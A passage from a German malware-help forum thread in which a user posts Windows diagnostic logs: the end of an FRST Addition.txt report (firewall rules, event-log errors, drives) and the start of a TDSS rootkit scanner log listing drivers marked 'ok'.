FirewallRules: [{C5360BE6-1303-4A0E-8023-CC62F60B1E04}] => (Allow) D:\Programme\Ubisoft\Anno4.exe
FirewallRules: [{9274C44A-8563-4D10-AD7B-8DF46B5A8A84}] => (Allow) D:\Programme\Ubisoft\Addon.exe
FirewallRules: [{FC814241-9258-4F19-AF41-DB88E23957C1}] => (Allow) D:\Programme\Ubisoft\Addon.exe
FirewallRules: [{0B9C568A-9F54-4F5F-8A13-29E3E60DFD10}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe
FirewallRules: [{0A57F8DB-B618-48DA-A350-95E445171171}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe
FirewallRules: [{B609DA77-EEAE-4331-AF04-D6B0B12DD462}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe
FirewallRules: [{7F026620-DD5A-46CF-A2A1-E22FB29A9F0F}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe
FirewallRules: [{6207A230-EB6A-4610-B892-DF526C5DA9CB}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe
FirewallRules: [{6413A299-3AE2-4728-8D88-DBC7F4693304}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe
FirewallRules: [{8395ECDA-6B23-440A-961A-1338B31E9BCF}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe
FirewallRules: [{F954F9EC-FC53-42E6-8C62-5FAAB7F337F6}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe
FirewallRules: [{E6D4C42C-CFAE-433E-A5C8-75DD628070A2}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe
FirewallRules: [{DA17C889-BA52-4AEA-B1F7-56B213754083}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe
FirewallRules: [{B064A02F-82D3-46C7-BE5E-4847D6F8F3DD}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe
FirewallRules: [{46A60120-A927-4D76-888D-6D7D4D4928C8}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe
FirewallRules: [{614BDF81-34E7-4EF0-AF9D-124919FC7689}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe
FirewallRules: [{D83D6FE6-C127-45CA-9089-CB5A015F1059}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe
FirewallRules: [{8C525B9B-2F76-4D2A-88BF-33045C4BF9F4}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe
FirewallRules: [{8170164A-B9FD-4092-A573-9EEFE3E8D466}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe
FirewallRules: [TCP Query User{D3C7FE0D-703D-47B1-8FA2-AB9592BF1E7B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{6BF3876D-F5A1-4D45-B983-F240E0C30606}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [{3495CC5B-8440-473C-99FE-BB14A3B532D1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Wiederherstellungspunkte =========================

19-05-2017 15:50:08 Geplanter Prüfpunkt
21-05-2017 20:53:51 Revo Uninstaller's restore point - Spybot - Search & Destroy

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (05/21/2017 08:56:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x1ba0
Startzeit der fehlerhaften Anwendung: 0x01d2d263f2a109cb
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: ae299761-9933-4de1-aba7-7a3113a27840
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/21/2017 08:53:51 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.


Vorgang:
   Generatordaten werden gesammelt

Kontext:
   Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
   Generatorname: System Writer
   Generatorinstanz-ID: {3c5a8c27-ffbd-4938-9377-2dfe4cb6a471}

Error: (05/21/2017 12:27:16 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/21/2017 12:24:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xbd0
Startzeit der fehlerhaften Anwendung: 0x01d2d21c6c50fef8
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: f582f64c-3373-478a-a15b-f929adac582c
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/20/2017 08:03:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xde4
Startzeit der fehlerhaften Anwendung: 0x01d2d1935ab86bd9
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: bce9150f-3248-4ead-8318-8150d1bf8130
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/20/2017 02:27:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x203c
Startzeit der fehlerhaften Anwendung: 0x01d2d16481b9cf5d
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 4df17c98-057f-4230-b052-4a764dc63e50
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/20/2017 10:19:14 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/20/2017 10:16:45 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xe7c
Startzeit der fehlerhaften Anwendung: 0x01d2d141696bf18e
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 9853c85f-3fc8-4b95-b23c-2a10b9d919d4
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/19/2017 03:30:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: odslv.exe, Version: 21.0.25.80, Zeitstempel: 0x58fa3511
Name des fehlerhaften Moduls: sciter.dll, Version: 4.0.0.7, Zeitstempel: 0x59146bc0
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000018da1b
ID des fehlerhaften Prozesses: 0xe04
Startzeit der fehlerhaften Anwendung: 0x01d2d0a3e937c3db
Pfad der fehlerhaften Anwendung: C:\Program Files\Bitdefender\Bitdefender 2017\odslv.exe
Pfad des fehlerhaften Moduls: C:\Program Files\Bitdefender\Bitdefender 2017\sciter.dll
Berichtskennung: 55771ade-ec8b-4200-84b1-9a5029b17a41
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/19/2017 03:29:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: odslv.exe, Version: 21.0.25.80, Zeitstempel: 0x58fa3511
Name des fehlerhaften Moduls: sciter.dll, Version: 4.0.0.7, Zeitstempel: 0x59146bc0
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000018da1b
ID des fehlerhaften Prozesses: 0x2788
Startzeit der fehlerhaften Anwendung: 0x01d2d0a3bfd8df47
Pfad der fehlerhaften Anwendung: C:\Program Files\Bitdefender\Bitdefender 2017\odslv.exe
Pfad des fehlerhaften Moduls: C:\Program Files\Bitdefender\Bitdefender 2017\sciter.dll
Berichtskennung: e7f89512-ad7c-48f5-9beb-8270e1eacebe
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:


Systemfehler:
=============
Error: (05/21/2017 08:56:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/21/2017 08:56:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/21/2017 08:55:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "RtNdPt630" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/21/2017 08:55:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: 
Die Anforderung wird nicht unterstützt.

Error: (05/21/2017 08:55:17 PM) (Source: DCOM) (EventID: 10010) (User: ***)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (05/21/2017 12:24:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/21/2017 12:24:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/20/2017 08:03:16 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/20/2017 08:03:16 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/20/2017 02:27:55 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.


CodeIntegrity:
===================================
  Date: 2017-05-21 20:59:59.585
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 20:59:59.549
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 20:55:53.503
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-05-21 20:48:35.581
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 17:35:59.505
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SysWOW64\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf32.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 14:50:07.831
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 14:50:07.798
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 12:28:31.255
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-05-21 01:33:57.070
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-20 20:19:32.035
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
Prozentuale Nutzung des RAM: 30%
Installierter physikalischer RAM: 8127.12 MB
Verfügbarer physikalischer RAM: 5675.46 MB
Summe virtueller Speicher: 14527.12 MB
Verfügbarer virtueller Speicher: 11620.5 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.69 GB) (Free:147.43 GB) NTFS
Drive d: () (Fixed) (Total:931.51 GB) (Free:620.58 GB) NTFS
Drive e: (User Manual) (CDROM) (Total:0.19 GB) (Free:0 GB) CDFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 83B6EBCC)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: EA468D08)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================
         

Alt 21.05.2017, 21:29   #9
dinoexe
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Code:
ATTFilter
21:26:49.0660 0x2380  TDSS rootkit removing tool 3.1.0.15 Apr 18 2017 11:34:02
21:26:52.0765 0x2380  ============================================================
21:26:52.0765 0x2380  Current date / time: 2017/05/21 21:26:52.0765
21:26:52.0765 0x2380  SystemInfo:
21:26:52.0766 0x2380  
21:26:52.0766 0x2380  OS Version: 10.0.15063 ServicePack: 0.0
21:26:52.0766 0x2380  Product type: Workstation
21:26:52.0766 0x2380  ComputerName: WELTZ
21:26:52.0767 0x2380  UserName: Dino
21:26:52.0767 0x2380  Windows directory: C:\WINDOWS
21:26:52.0767 0x2380  System windows directory: C:\WINDOWS
21:26:52.0767 0x2380  Running under WOW64
21:26:52.0767 0x2380  Processor architecture: Intel x64
21:26:52.0767 0x2380  Number of processors: 8
21:26:52.0767 0x2380  Page size: 0x1000
21:26:52.0767 0x2380  Boot type: Normal boot
21:26:52.0767 0x2380  CodeIntegrityOptions = 0x00000001
21:26:52.0767 0x2380  ============================================================
21:26:52.0850 0x2380  KLMD registered as C:\WINDOWS\system32\drivers\26266876.sys
21:26:52.0850 0x2380  KLMD ARK init status: drvProperties = 0xFFF00, osBuild = 15063.0, osProperties = 0x19
21:26:52.0984 0x2380  System UUID: {125CD7E0-CE60-5CA6-C788-ADA075B3A158}
21:26:53.0216 0x2380  Drive \Device\Harddisk0\DR0 - Size: 0x3B9E656000 ( 238.47 Gb ), SectorSize: 0x200, Cylinders: 0x799A, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
21:26:53.0217 0x2380  Drive \Device\Harddisk1\DR1 - Size: 0xE8E0DB6000 ( 931.51 Gb ), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
21:26:53.0219 0x2380  ============================================================
21:26:53.0220 0x2380  \Device\Harddisk0\DR0:
21:26:53.0220 0x2380  MBR partitions:
21:26:53.0220 0x2380  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0xAF000
21:26:53.0220 0x2380  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0xAF800, BlocksNum 0x1DB62000
21:26:53.0220 0x2380  \Device\Harddisk1\DR1:
21:26:53.0410 0x2380  MBR partitions:
21:26:53.0410 0x2380  \Device\Harddisk1\DR1\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x74705800
21:26:53.0410 0x2380  ============================================================
21:26:53.0413 0x2380  C: <-> \Device\Harddisk0\DR0\Partition2
21:26:53.0416 0x2380  D: <-> \Device\Harddisk1\DR1\Partition1
21:26:53.0416 0x2380  ============================================================
21:26:53.0416 0x2380  Initialize success
21:26:53.0416 0x2380  ============================================================
21:26:59.0184 0x0ce4  ============================================================
21:26:59.0184 0x0ce4  Scan started
21:26:59.0184 0x0ce4  Mode: Manual; SigCheck; TDLFS; 
21:26:59.0184 0x0ce4  ============================================================
21:26:59.0184 0x0ce4  KSN ping started
21:26:59.0492 0x0ce4  KSN ping finished: true
21:27:00.0117 0x0ce4  ================ Scan system memory ========================
21:27:00.0117 0x0ce4  System memory - ok
21:27:00.0117 0x0ce4  ================ Scan services =============================
21:27:00.0141 0x0ce4  [ AAB860A5E606B9621E130D8C29D3F305, 93466620433B27F3BCFECDA26DD420AD1E5219034BA3B4E930EDED6D6728AE5C ] 1394ohci        C:\WINDOWS\System32\drivers\1394ohci.sys
21:27:00.0169 0x0ce4  1394ohci - ok
21:27:00.0180 0x0ce4  [ 4140B14929C555E9513D59A2EEB5C471, 39A8400B3AA7FB1D8EBE87E65F89881AB23B6AE911BECAEC1FD86C7DADD4F1AA ] 3ware           C:\WINDOWS\system32\drivers\3ware.sys
21:27:00.0188 0x0ce4  3ware - ok
21:27:00.0200 0x0ce4  [ D3DB4E3C096EFF74FB6E73E37CB66DD7, 451BE72D50D2316690910B86ACA1EBB5C0F3FE688BAB806EC94BCCB6F3798A0A ] ACPI            C:\WINDOWS\system32\drivers\ACPI.sys
21:27:00.0218 0x0ce4  ACPI - ok
21:27:00.0221 0x0ce4  [ 3E5E5DAE5CAEC0209C93D3AD8128D8A0, 5CFA4D715AE8D928EA11F213C5A7B0B1C1705D2A8FF041E0A1988E645E669C54 ] AcpiDev         C:\WINDOWS\System32\drivers\AcpiDev.sys
21:27:00.0229 0x0ce4  AcpiDev - ok
21:27:00.0233 0x0ce4  [ F72D7CC7E7A97A09757313F3B4C7E17A, 36E3363380C51A2DB58D3177655A0A75DAA977C00C5A9C60A189068C0AFDC643 ] acpiex          C:\WINDOWS\system32\Drivers\acpiex.sys
21:27:00.0241 0x0ce4  acpiex - ok
21:27:00.0244 0x0ce4  [ F04B6F53FBDB2B6B0451AE53DE19F0C9, 41A8C314A46867BAA45CD9666AAF734AD45B74E2033A8E66D93E17CDDAD66578 ] acpipagr        C:\WINDOWS\System32\drivers\acpipagr.sys
21:27:00.0251 0x0ce4  acpipagr - ok
21:27:00.0253 0x0ce4  [ C347A6095F3BE417D24F1E1349F4AF0F, 72C9D759BB132985AF55860658DC01F08590A2BD7E976FCF25E1314C5AA1D37B ] AcpiPmi         C:\WINDOWS\System32\drivers\acpipmi.sys
21:27:00.0260 0x0ce4  AcpiPmi - ok
21:27:00.0263 0x0ce4  [ 686BFFC47454DD2F58795C2EE891CA9F, 6CC4B6679914742D700A8373DED2DD9A821CA5284D4D73493BA0855DB8E6520A ] acpitime        C:\WINDOWS\System32\drivers\acpitime.sys
21:27:00.0270 0x0ce4  acpitime - ok
21:27:00.0284 0x0ce4  [ E6A1D864EC90F4397DF5AB2633B34DD4, 05F1B7291EBDD9CA1D74649C0DAFCBE5F2CF93E92C5CA16A8AC10B6DF83101A0 ] AdobeFlashPlayerUpdateSvc C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
21:27:00.0293 0x0ce4  AdobeFlashPlayerUpdateSvc - ok
21:27:00.0312 0x0ce4  [ FBDA59118E59B3722248C66BAD89CAA9, 11AB83499757E3143834348DE39E85D56EC853071C96337C3ADD8A1E374C6CBC ] ADP80XX         C:\WINDOWS\system32\drivers\ADP80XX.SYS
21:27:00.0335 0x0ce4  ADP80XX - ok
21:27:00.0348 0x0ce4  [ AC1928C2F7505BD556C552F153B062AB, B48EA30F76DEA57868CA74CC775DD60257021A3DE10CE101B8BEFA1CE9D22CF4 ] AFD             C:\WINDOWS\system32\drivers\afd.sys
21:27:00.0363 0x0ce4  AFD - ok
21:27:00.0369 0x0ce4  [ 1D914C996F2C3134E2344BB74F79BCF6, D27AF01BA29784555AF7D2E89A3A65E81D6AFE1D3C7E8F9367F06D9DF5F88069 ] ahcache         C:\WINDOWS\system32\DRIVERS\ahcache.sys
21:27:00.0381 0x0ce4  ahcache - ok
21:27:00.0384 0x0ce4  [ 41856B40EE15F96DEC8755AB01FA3CF7, 33C3C899AF9CA15BE5A4CF097FF43DF3F0DBA0E48B6F1E28AE3E76AD76A1C361 ] AJRouter        C:\WINDOWS\System32\AJRouter.dll
21:27:00.0392 0x0ce4  AJRouter - ok
21:27:00.0396 0x0ce4  [ F485CA5559DB37A4882467A4F7D58BEA, A1C648EFE12A5A3356BC0949372ADD0FF0CA2F5A8F992EB71C87E9C0D5C92BB2 ] ALG             C:\WINDOWS\System32\alg.exe
21:27:00.0404 0x0ce4  ALG - ok
21:27:00.0414 0x0ce4  [ D3E9EEDC0128DD1FB9E45D85E7E21F0B, 73853DC77CCE335F1571DB31C6F7E97D71625DC6226089E8281F62020F58CB8F ] AMD External Events Utility C:\WINDOWS\system32\atiesrxx.exe
21:27:00.0432 0x0ce4  AMD External Events Utility - ok
21:27:00.0440 0x0ce4  [ 08E3B9567A6FDD17A69956BA80F1E2D6, 179C4A09E51A41289C1AA11E778EB09E877A7F45FB5D54216F58D3EAF1FA88C4 ] amdacpksd       C:\WINDOWS\system32\drivers\amdacpksd.sys
21:27:00.0450 0x0ce4  amdacpksd - ok
21:27:00.0455 0x0ce4  [ 9C39FBA94FFEF04561D13ED0D1B50DD0, 53FA118DEF37F0BA6030B9CB4C17019E6B5934941514756D66143B7BB66D7CA1 ] AmdK8           C:\WINDOWS\System32\drivers\amdk8.sys
21:27:00.0465 0x0ce4  AmdK8 - ok
21:27:00.0469 0x0ce4  [ 275B6F698CBEC36C42D3ABD7EE049BA1, C6CE3514947F67410B34E8973C87996A14FF485A2E5C7E5BA4FE276FB893D51C ] amdkmafd        C:\WINDOWS\system32\drivers\amdkmafd.sys
21:27:00.0476 0x0ce4  amdkmafd - ok
